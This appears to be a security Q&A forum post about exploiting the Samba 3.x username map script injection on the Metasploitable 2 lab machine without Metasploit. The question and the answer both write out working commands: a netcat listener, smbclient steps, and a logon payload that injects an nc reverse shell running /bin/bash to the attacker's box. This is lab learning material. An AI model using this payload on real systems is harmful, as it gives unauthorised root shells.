Information Security
metasploit kali-linux samba metasploitable
Updated Sat, 16 Jul 2022 08:34:09 GMT

Reverse connection Metasploitable 2 -> Kali Linux (Samba 3.x) without Metasploit

I am trying to exploit Metasploitable 2 without the use of Metasploit, with the aim of learning. In this case, I am focusing on Samba 3.x (Port TCP 139, 445)

In this link two different methods are explained to exploit this machine after an nmap scan reveals TCP ports 139, and 445 open, which are running Samba version 3.x.

The second method explains that

This vulnerability takes advantage of the username map script functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.

My problem comes when Metasploit is used, as it is used in:

I finally found this video that avoids Metasploit but it doesn't work for me, where it follows (Kali=; Metasploitable2=

  1. In Terminal window 1, we set netcat to listen:

    netcat -nlvp 4444

  2. In Terminal window 2, we check the share

    smbclient -L //

  3. We focus on the tmp folder, and connect (Terminal 2):

    smbclient //

  4. Finally, we obtain "smb: >" where the command "logon" is used to reverse connect to Kali, as

    smb: > logon "/=nc 4444 -e /bin/bash"

This last point doesn't work for me with the following error message "session setup failed: NT_STATUS_NO_MEMORY".

It is hard for me to find a good manual that explains the "logon" command. I tried changing the way netcat is used:

In point 1. I write

smb: \> nc -nlvp 4444 -e /bin/bash

In point 4. I write

smb: \> logon "/=`nc 4444 -e /bin/bash`"

Same results. Same message error.

I really tried to do it by myself, but couldn't. I would be very grateful if you could help me.

Thank you in advance!!


It looks like you are setting up your listener in smb (vulnerable box).

smb: \> nc -nlvp 4444 -e /bin/bash

What you should be doing is setting up the listener in your attacking box. using the following command instead:

nc -nlvp 4444 

Finally from your metasploitable2 you issue the command:

logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"